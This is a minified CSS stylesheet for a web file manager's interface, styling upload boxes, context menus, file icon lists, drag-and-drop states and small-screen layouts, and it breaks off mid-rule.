.menu:hover{background:#fff;}.file-upload-box .upload-box{margin-top:10px;}.file-upload-box .download-btn-group{margin-left:-10px;margin-top:-2px;margin-top:-4px \9;}.file-upload-box .download-btn-group .download-start{border-radius:0px;}.file-upload-box .upload-box-tips .btn.btn-default{border-radius:3px;color:#555;}.file-upload-box .upload-box-tips .btn-group>.btn:last-child:not(:first-child),.file-upload-box .upload-box-tips .btn-group>.dropdown-toggle:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0;}.file-upload-box div a.left{margin-left:10px;}.file-upload-box div a.right{position:absolute;right:5px;}.file-upload-box span.info{font-size:1em;font-style:italic;padding:0px 0 5px 10px;}.file-upload-box i{font-size:1em;color:#aaa;padding-left:10px;}.file-upload-box .list{margin:10px 15px 10px 0;}.file-upload-box .list input{margin-left:10px;width:190px;height:22px;line-height:24px;padding:0px 3px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;}.file-upload-box .list input:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.file-upload-box .submit input{float:right;padding:4px 20px;background:#ddd;border:none;margin-right:36px;margin-top:10px;}.file-upload-box .submit input:hover{background:#bbb;}.file-upload-box .submit input:active{background:#444;color:#fff;}.file-upload-box .uploader-content{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;background:url("../../../images/common/drop_upload.png") no-repeat center;}.file-upload-box #downloader{border:1px solid #ddd;margin:0 10px;font-size:1em;overflow:auto;position:absolute;bottom:10px;right:0px;left:0px;top:124px;}.file-upload-box .webuploader-container{position:relative;}.file-upload-box .webuploader-element-invisible{position:absolute !important;clip:rect(1px 1px 1px 1px);clip:rect(1px,1px,1px,1px);}.file-upload-box .webuploader-pick{position:relative;display:inline-block;color:#fff;text-align:center;height:27px;line-height:27px;border-radius:3px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);cursor:pointer;padding:0px 15px;}.file-upload-box .webuploader-pick-hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .upload-cert{width:24px;background:#def;height:100%;float:left;cursor:pointer;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);height:27px;line-height:27px;position:relative;z-index:10;padding:0;border:none;margin-left:-5px;border-left:1px solid rgba(0,0,0,0.1);border-top-right-radius:3px;border-bottom-right-radius:3px;}.file-upload-box .upload-cert .caret{margin-top:-2px;margin-left:-1px;border-top:4px solid #fff;}.file-upload-box .upload-cert-box .dropdown-menu{right:inherit;top:inherit;margin-top:30px;}.file-upload-box .upload-cert-box .dropdown-menu:before{right:inherit;left:10px;}.file-upload-box .upload-cert-box .dropdown-menu:after{right:inherit;left:11px;}.file-upload-box .upload-cert-box.open.upload-cert,.file-upload-box .upload-cert-box .upload-cert:hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#84c8ff', endColorstr='#6091ff');background-image:-webkit-linear-gradient(top,#84C8FF,#6091FF);background-image:-moz-linear-gradient(top,#84C8FF,#6091FF);background-image:-o-linear-gradient(top,#84C8FF,#6091FF);background-image:-ms-linear-gradient(top,#84C8FF,#6091FF);background-image:linear-gradient(top,#84C8FF,#6091FF);-pie-background:linear-gradient(to top,#84C8FF,#6091FF);box-shadow:inset 0 1px 1em rgba(0,0,0,0.3);}.file-upload-box .webuploader-pick-disable{opacity:0.6;filter:alpha(opacity=60);pointer-events:none;}.file-upload-box .btns{margin-bottom:10px;font-size:1em;height:28px;}.file-upload-box .btns .tips{float:right;line-height:30px;}.file-upload-box .btns #picker{float:left;}.file-upload-box .upload-box-tips{line-height:34px;color:#888;position:absolute;right:10px;}.file-upload-box .upload-box-config{box-shadow:inset 0px 1px 6px rgba(0,0,0,0.3);border-radius:2px;margin-bottom:10px;padding:4px;}.file-upload-box .upload-box-config .upload-check-box{margin-left:10px;}.file-upload-box .upload-box-config label{margin-left:15px;}.file-upload-box .upload-box-config label input{margin-right:5px;}.file-upload-box .uploader-list .item,.file-upload-box .download-list .item{padding:0px;height:35px;overflow:hidden;position:relative;border-bottom:1px solid #ccc;background:#fefefe;}.file-upload-box .uploader-list .item .info,.file-upload-box .download-list .item .info{color:#224;line-height:35px;padding:0 5px;z-index:100;position:relative;font-size:1em;}.file-upload-box .uploader-list .item .info span,.file-upload-box .uploader-list .item .info a,.file-upload-box .download-list .item .info span,.file-upload-box .download-list .item .info a{float:left;height:30px;display:block;overflow:hidden;text-overflow:ellipsis;white-space:nowrap;}.file-upload-box .uploader-list .item .info .title,.file-upload-box .download-list .item .info .title{color:#3A87AD;width:160px;width:50%;font-weight:800;}.file-upload-box .uploader-list .item .info .size,.file-upload-box .download-list .item .info .size{width:45px;text-align:center;color:#3A87AD;font-size:12px;}.file-upload-box .uploader-list .item .info .state,.file-upload-box .download-list .item .info .state{width:100px;width:27%;text-align:right;font-size:12px;}.file-upload-box .uploader-list .item .info .font-icon,.file-upload-box .download-list .item .info .font-icon{margin-left:12px;font-size:20px;width:20px;line-height:35px;cursor:pointer;color:#bbb;}.file-upload-box .uploader-list .item .info .font-icon:hover,.file-upload-box .download-list .item .info .font-icon:hover{text-decoration:none;color:#f60;}.file-upload-box .uploader-list .item .info .icon-ok,.file-upload-box .download-list .item .info .icon-ok{color:#40AA53;}.file-upload-box .uploader-list .item .info .error,.file-upload-box .download-list .item .info .error{color:#f30;}.file-upload-box .uploader-list .item.success,.file-upload-box .download-list .item.success{background:#eaf8ff;}.file-upload-box .uploader-list .item.error,.file-upload-box .download-list .item.error{background:#ffe8e6;}.file-upload-box .uploader-list .item .progress,.file-upload-box .download-list .item .progress{height:38px;margin:0px;width:100%;border-radius:0;box-shadow:none;position:absolute;top:0;}.file-upload-box .uploader-list .item .progress-bar,.file-upload-box .download-list .item .progress-bar{background-color:#adf;background-image:linear-gradient(45deg,rgba(255,255,255,0.35) 25%,transparent 25%,transparent 50%,rgba(255,255,255,0.35) 50%,rgba(255,255,255,0.35) 75%,transparent 75%,transparent);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#ddeeff',endColorstr='#88ccff',GradientType=1);BACKGROUND-REPEAT:repeat-x;}.file-upload-box .uploader-list .success:hover,.file-upload-box .download-list .success:hover{cursor:pointer;background:#def;border-bottom:1px solid #3A87AD;}@media screen and (-ms-high-contrast:active),(-ms-high-contrast:none){.btn{ padding:5px 14px;} input[type='checkbox'].kui-checkbox-ios.size-big + em{ height:27px;} #body .system-content .right-frame .user-list table tr td.select input{ position:relative;top:4px;} #body table tr input[type='text']{ line-height:22px;} .do-search-box .search-header .btn-right{ margin:-9px 0 0 -2px;height:23px;} .appbox .appline.icon .open{ margin-top:-2px;} .appbox .appline label{ position:relative;top:-4px;} #body .main .group-editor .tag input{ position:relative;top:-5px;} .share-dialog .aui-border{ overflow:auto;} .share-dialog .content-box .content-info .input-line.select-path a.select-btn{ padding:3px 8px 4px;} .kui-radio + span, .kui-checkbox + span{ position:relative;top:-6px;} .kui-radio.size-small + span, .kui-checkbox.size-small + span{ position:relative;top:-4px;} .kui-radio.size-smallx + span, .kui-checkbox.size-smallx + span{ position:relative;top:-2px;}}@media (max-width:743px){html #body .app-menu-left, html body .app-menu-left{ width:50px;min-width:50px;} html #body .app-menu-left .search{ opacity:0.001;} html #body .menu-left .setting a.selected, html body .menu-left .setting a.selected{ padding-left:0px;margin-left:-5px;} html #body .main.app-content, html body .main.app-content{ left:50px;} html #body .main.app-content .app-list, html body .main.app-content .app-list{ justify-content:space-around;} html .form-box .form-row .setting-title{ text-align:left;} html .form-box .form-row.form-userSelect .setting-content{ padding:10px 5%;} html .form-box .form-row .setting-content{ width:90%;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group{ width:100%;height:40px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .form-box.config-box .panel-body{ left:0px;top:80px;} html body .dialog-plugin-config.dialog-no-title.form-dialog-has-menu .tab-group .tab-item{ float:left;} html #body.plugin-page .app-menu-left .line, html body.plugin-page .app-menu-left .line{ padding:4px 0;} html body #body .menu-left, html body #body .app-menu-left{ width:50px;min-width:50px;} html body #body .menu-left h1, html body #body .app-menu-left h1{ font-size:14px;font-weight:800 !important;padding:10px 0px 10px 0px;text-align:center;} html body #body .menu-left .font-icon, html body #body .app-menu-left .font-icon{ padding-right:30px;} html #body .setting-tools-right, html body .setting-tools-right{ top:0;} html #body .main .nav a, html body .main .nav a{ padding:5px 10px;} html #body .main .nav, html body .main .nav{ margin-right:0px;} html #body .setting-tab, html body .setting-tab, html #body .system-content, html body .system-content{ margin-right:10px;} html #body .main, html body .main{ left:50px;width:auto;margin-right:10px;} html .form-box .form-row .desc, html .form-box .form-row .setting-content i{ display:block;} html #body .setting-tab .form-row, html body .setting-tab .form-row, html #body .system-content .form-row, html body .system-content .form-row{ background:#fafafa;border-radius:4px;padding:0 5px;} html .form-box .form-row .setting-title{ height:20px;line-height:20px;} html .form-box .form-row{ padding:0;} html .form-box .form-row input[type='text'], html .form-box .form-row input[type='password'], html .form-box .form-row input[type='number']{ width:180px;} html .form-box .form-row #wallpage-url{ width:150px !important;} html #body .main .section .content .box p, html body .main .section .content .box p{ text-indent:10px;} html #body .system-content.setting-member{ width:800px;} html body.setting-page .select-user-group .right-content, html body.setting-page .select-user-group .left-content{ width:170px;} html .topbar .content .top-right ul.dropdown-menu.topbar-language{ width:235px;max-height:800px;} html #body .main .section .box, html body .main .section .box{ margin-right:10px;} html #body .main .section .box .list, html body .main .section .box .list{ width:95px;height:95px;} html #body .main .section .box .list .ico, html body .main .section .box .list .ico{ width:75px;height:60px;} html #body .panel, html body .panel{ margin-right:0px;} html #body .main.app-content .app-list .app-li, html body .main.app-content .app-list .app-li{ margin:0 5px 20px 0;width:130px;} html #body .main.app-content .app-model, html body .main.app-content .app-model{ padding:10px;} html #body .menu-left .setting a, html body .menu-left .setting a{ text-indent:6px;} html .file-list-list .file .filename, html #main-title .filename, html .file-list-list .file .filetime, html #main-title .filetime{ width:100px;} html .file-list-list .file .filetype, html #main-title .filetype, html .file-list-list .file .filesize, html #main-title .filesize{ width:30px;} html .topbar .content .btn-wap-menu{ display:block !important;visibility:visible !important;position:absolute;text-align:center;z-index:100;left:0;top:0;padding:0;background:rgba(0,0,0,0.05);width:45px;height:38px;line-height:40px;} html .topbar .content .btn-wap-menu i.font-icon{ padding-right:0;} html .topbar .content .top-left.collapse{ display:none;} html .topbar .content .top-left{ width:170px;height:auto;background:#fff;color:#666;position:absolute;left:45px;z-index:100;border:1px solid rgba(0,0,0,0.1);box-shadow:0 4px 30px rgba(0,0,0,0.15);} html .topbar .content .top-left .topbar-menu.title{ display:none;} html .topbar .content .top-left .topbar-menu{ float:none;border:none;} html body#page-desktop .topbar .content .btn-wap-menu{ color:#fff;} html body#page-desktop .topbar .content .top-left{ background:rgba(0,0,0,0.7);}}@-webkit-keyframes fadein{0%{ opacity:0;} 50%{ opacity:0.4;}}.playmusic-icon{display:none;}.context-menu-list{margin:0;margin-left:4px;min-width:190px;max-width:300px;font-size:1em;display:inline-block;position:absolute;list-style-type:none;padding:8px 0px;border:none;border:1px solid #ccc \9;border-radius:4px;background:#fff;-webkit-box-shadow:0 10px 80px rgba(0,0,0,0.4);-moz-box-shadow:0 10px 80px rgba(0,0,0,0.4);box-shadow:0 10px 80px rgba(0,0,0,0.4);}.context-menu-list span b{display:inline-block;font-size:1em;font-weight:200;color:#aaa;padding-left:10px;min-width:50px;text-align:right;overflow:hidden;position:absolute;right:10px;width:65px;}.context-menu-list .hover>span>b{color:#fff;}.context-menu-list.menu-auto-fit{top:5px !important;}.context-menu-list li.selected{border-left:none !important;background:none;}.context-menu-list li.selected i.font-icon{color:#aaa;font-family:FontAwesome;font-weight:normal;font-style:normal;}.context-menu-list li.selected i.font-icon:before{content:"\f00c" !important;}.context-menu-list .context-menu-submenu:after{content:"\f0da";font-family:FontAwesome;display:inline-block;float:right;margin-right:0px;right:10px;position:absolute;}.context-menu-list .context-menu-item{display:block;cursor:pointer;white-space:nowrap;clear:both;line-height:25px;height:23px;position:relative;border:none;padding:0px 20px 0 15px;color:#222;-webkit-transition:background-color .1s;-moz-transition:background-color .1s;-o-transition:background-color .1s;-ms-transition:background-color .1s;transition:background-color .1s;}.context-menu-list .context-menu-item .font-icon{display:inline-block;width:16px;text-align:center;font-size:1.2em;color:#aaa;margin-right:15px;vertical-align:middle;margin-top:-2px;padding:0;}.context-menu-list .context-menu-item.disabled,.context-menu-list .context-menu-item.disable{cursor:not-allowed;pointer-events:auto;color:#ccc;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{color:#ddd;}.context-menu-list .context-menu-item.disabled.hover,.context-menu-list .context-menu-item.disable.hover{color:#ccc;cursor:default;background-color:#fff;}.context-menu-list .context-menu-item.disabled.hover .font-icon,.context-menu-list .context-menu-item.disable.hover .font-icon{color:#ddd;}.context-menu-list .context-menu-item.hover{cursor:pointer;color:#fff;background:#63acff;background-color:none \9;}.context-menu-list .context-menu-item.hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item span i{float:right;text-align:right;font-style:normal;color:#888;}.context-menu-list .context-menu-item.context-menu-separator{height:2px;line-height:0;border-bottom:1px solid #eee;margin:2px 0 4px;}.context-menu-list .context-menu-item > .context-menu-list{display:none;right:-5px;top:5px;}.context-menu-list .context-menu-item.hover > .context-menu-list{display:block;}.context-menu-list .context-menu-item.hover > .context-menu-list .font-icon{color:#aaa;}.context-menu-list .context-menu-item.hover > .context-menu-list .hover .font-icon{color:#fff;color:#aaa \9;}.context-menu-list .context-menu-item .context-menu-accesskey{text-decoration:underline;}.context-menu-list .context-menu-item .line-top{border-top:1px solid #ddd !important;}.font-icon.icon-home,.x-tree-self{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;filter:none;-ms-filter:none;}.font-icon.icon-home:before,.x-tree-self:before{content:"" !important;}.font-icon.icon-circle-arrow-up{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -496px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.font-icon.icon-circle-arrow-up:before{content:"" !important;}.x-tree-fav.small{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;}.x-tree-fav.small:before{content:"" !important;}.frame-right #search .font-icon.icon-search{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -736px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;margin-right:0px;margin-top:4px;}.frame-right #search .font-icon.icon-search:before{content:"" !important;}.context-menu-list .font-icon:before{color:#249dff;background-image:-webkit-linear-gradient(2deg,#249dff,#08558a);background-clip:text;text-fill-color:transparent;-webkit-text-fill-color:transparent;-webkit-background-clip:text;}.context-menu-list .context-menu-item.disabled .font-icon,.context-menu-list .context-menu-item.disable .font-icon{opacity:0.3;filter:alpha(opacity=30);}.context-menu-list .context-menu-item.search .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 0px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.search .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open .font-icon,.context-menu-list .context-menu-item.open-the-path .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open .font-icon:before,.context-menu-list .context-menu-item.open-the-path .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.upload .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.upload .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.down .font-icon,.context-menu-list .context-menu-item.download .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -48px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.down .font-icon:before,.context-menu-list .context-menu-item.download .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.cute .font-icon,.context-menu-list .context-menu-item.cute-to .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.cute .font-icon:before,.context-menu-list .context-menu-item.cute-to .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.copy .font-icon,.context-menu-list .context-menu-item.copy-to .font-icon,.context-menu-list .context-menu-item.copy-see .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -96px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.copy .font-icon:before,.context-menu-list .context-menu-item.copy-to .font-icon:before,.context-menu-list .context-menu-item.copy-see .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -16px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfolder .icon-folder-close-alt:before{content:"" !important;}.context-menu-list .context-menu-item.newfile .icon-expand-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.newfile .icon-expand-alt:before{content:"" !important;}.context-menu-list .context-menu-item.rname .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.rname .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.past .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -64px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.past .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.remove .font-icon,.context-menu-list .context-menu-item.fav-remove .font-icon,.context-menu-list .context-menu-item .close .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -80px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.remove .font-icon:before,.context-menu-list .context-menu-item.fav-remove .font-icon:before,.context-menu-list .context-menu-item .close .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.zip .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.zip .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0 -32px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.unzip .icon-folder-open-alt:before{content:"" !important;}.context-menu-list .context-menu-item.share .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-15px -703px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.share .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.open-text .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -702px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.open-text .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.setBackground .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -609px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.setBackground .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.fav .font-icon,.context-menu-list .context-menu-item.fav-page .font-icon{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -773px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.fav .font-icon:before,.context-menu-list .context-menu-item.fav-page .font-icon:before{content:"" !important;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:0px -577px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.set-file-icon-size .font-icon.icon-picture:before,.context-menu-list .context-menu-item.setting-wall .font-icon.icon-picture:before{content:"" !important;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:-16px -528px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.sort-by .font-icon.icon-sort:before{content:"" !important;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open{display:inline-block;background-image:url("../../../images/common/menu_icon.png");width:16px !important;background-position:1px -625px;background-size:auto !important;background-repeat:no-repeat;height:16px;margin-right:15px;}.context-menu-list .context-menu-item.list-icon .font-icon.icon-eye-open:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-code-fork{display:inline-block;background-image:url("../../../images/file_icon/icon_app/history.png");width:16px !important;background-repeat:no-repeat;background-size:100% 100%;}.context-menu-list .context-menu-item .font-icon.icon-code-fork:before{content:"" !important;}.context-menu-list .context-menu-item .font-icon.icon-info{color:#fff !important;background:#c4e5ff;text-align:center;width:15px;border-radius:50%;height:15px;line-height:15px;margin-right:15px;box-shadow:0 0 0 1px #6db9f5;}.select-container{position:absolute;cursor:default;width:0px;height:0px;border:1px solid #005ec9;background-color:#63acff;z-index:1000;opacity:0.5;filter:alpha(opacity=50);}.select-container:hover{cursor:default;}.file-draging{position:absolute;left:0;top:0px;z-index:1000;pointer-events:none;opacity:0.95;}.file-draging.file-list-icon,.file-draging.file-list-list,.file-draging.file-list-split{z-index:1000;overflow:visible;}.file-draging.file-list-icon div.file,.file-draging.file-list-list div.file,.file-draging.file-list-split div.file{clear:both;position:absolute;margin:0;transition:none !important;}.file-draging.file-list-icon div.file.handle_target,.file-draging.file-list-list div.file.handle_target,.file-draging.file-list-split div.file.handle_target{z-index:999;}.draggable-dragging{z-index:9999;clear:both !important;pointer-events:none;position:absolute !important;padding:5px;opacity:0.9;filter:alpha(opacity=90);background:#4285f4;border-radius:4px;color:#fff;box-shadow:3px 5px 15px rgba(0,0,0,0.2);font-size:1.15em;}.draggable-dragging .drag-number{display:none;}.draggable-dragging span{line-height:25px;padding-left:5px;padding-right:15px;}.draggable-dragging span .font-icon{display:inline-block;width:22px;height:22px;text-align:center;line-height:22px;color:#fff;font-size:1.0em;font-weight:800;margin-right:10px;border-radius:12px;}.draggable-dragging span .bg-default{background:#b9e0ff;color:#4285f4;}.draggable-dragging span .bg-ok{background:#6ee273;}.draggable-dragging span .bg-error{background:#FB2500;}.draggable-dragging span b{padding-right:15px;}.item-file-draging{opacity:0.5;filter:alpha(opacity=50);}.selectDragDraging .file-list-icon .file-select-drag-temp{transform:scale(1.1,1.1);}.file-continer .file .filename .title.db-click-rename{cursor:text;}.file-continer .file .item-menu{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;}.file-continer .file .item-menu:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-menu:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-menu .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select{display:none;position:absolute;right:4px;top:4px;width:14px;height:14px;box-sizing:content-box;text-align:center;border:1px solid #ddd;background:#fff;cursor:pointer;z-index:50;border-radius:2px;padding:2px;left:5px;border-radius:50%;background:rgba(0,0,0,0.05);border:none;color:#fff;}.file-continer .file .item-select:hover{border-color:#3399ff;background:#dff1ff;box-shadow:0 0 5px rgba(0,0,0,0.1);}.file-continer .file .item-select:hover .cert{border-top-color:#3399ff;}.file-continer .file .item-select .cert{margin-top:5px;margin-left:3px;width:0;height:0;border-left:4px solid transparent;border-right:4px solid transparent;border-top:5px solid silver;}.file-continer .file .item-select:hover{color:#fff;background:rgba(0,0,0,0.2);box-shadow:none;}.file-continer .file .item-select .item-check{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;font-size:12px;text-shadow:none;}.file-continer .file .item-select .item-check:after{content:"\f00c";position:relative;top:-1px;}.file-continer .file.hover .item-menu,.file-continer .file.select .item-menu,.file-continer .file.file-select-drag-temp .item-menu{display:block;}.file-continer .file.hover .item-select,.file-continer .file.select .item-select,.file-continer .file.file-select-drag-temp .item-select{display:block;}.file-continer .file.select .item-select{color:#fff;background:#3b8cff;}.file-continer.file-list-split .file .item-menu{top:3px;right:25px;}.file-continer.file-list-split .file .item-select{top:2px;right:45px;left:auto;}.file-continer.file-list-list .file .item-menu{top:4px;right:5px;}.file-continer.file-list-list .file .item-select{top:4px;right:25px;left:auto;}.file-list-icon{padding:10px 20px 0 10px;display:flex;justify-content:space-between;flex-wrap:wrap;align-items:flex-start;}.file-list-icon:after{width:82px;content:"";display:block;}.file-list-icon .flex-empty{width:75px;border:1px solid transparent;margin:0;margin-right:10px;margin-bottom:10px;visibility:hidden;height:0 !important;}.file-list-icon .meta-info{height:22.5px;width:22.5px;margin-right:6.75px;margin-top:-22.5px;position:absolute;right:0;}.file-list-icon .meta-info img{width:100%;height:100%;}.file-list-icon .file{color:#335;border:1px solid transparent;box-shadow:0px 0px 2px rgba(255,255,255,0);-webkit-transition:background 0.2s, border 0.2s, color 0.2s;-moz-transition:background 0.2s, border 0.2s, color 0.2s;-o-transition:background 0.2s, border 0.2s, color 0.2s;-ms-transition:background 0.2s, border 0.2s, color 0.2s;transition:background 0.2s, border 0.2s, color 0.2s;width:60px;height:75px;text-decoration:none;margin:0;margin-right:10px;margin-bottom:10px;overflow:hidden;float:left;}.file-list-icon .file .ico{-webkit-transition:all 0.168s;-moz-transition:all 0.168s;-o-transition:all 0.168s;-ms-transition:all 0.168s;transition:all 0.168s;}.file-list-icon .file.hover{border:1px solid #dedede;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#fafafa', endColorstr='#eeeeee');background-image:-webkit-linear-gradient(top,#fafafa,#eeeeee);background-image:-moz-linear-gradient(top,#fafafa,#eeeeee);background-image:-o-linear-gradient(top,#fafafa,#eeeeee);background-image:-ms-linear-gradient(top,#fafafa,#eeeeee);background-image:linear-gradient(top,#fafafa,#eeeeee);-pie-background:linear-gradient(to top,#fafafa,#eeeeee);border-radius:3px;}.file-list-icon .file .filename{width:60px;cursor:default;text-align:center;word-break:break-all;font-size:1.0em;margin:0 auto;line-height:1.5em;padding-bottom:5px;}.file-list-icon .file .filename .textarea{position:absolute;font-size:1.0em;text-align:center;margin-left:-1px;margin-top:-3px;}.file-list-icon .file .filename #pathRenameTextarea,.file-list-icon .file .filename .newfile{width:60px;padding:0px 0 4px 0;margin-top:0px;overflow-y:hidden;border:1px solid #888;font-size:1.0em;text-align:center;line-height:1.5em;position:absolute;z-index:999;margin-top:2px;border-bottom-left-radius:3px;border-bottom-right-radius:3px;}.file-list-icon .file .filename #pathRenameTextarea:focus,.file-list-icon .file .filename .newfile:focus{outline:none;}.file-list-icon .file.select,.file-list-icon .file.file-select-drag-temp{border:1px solid #d2d2d2;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#f3f3f3', 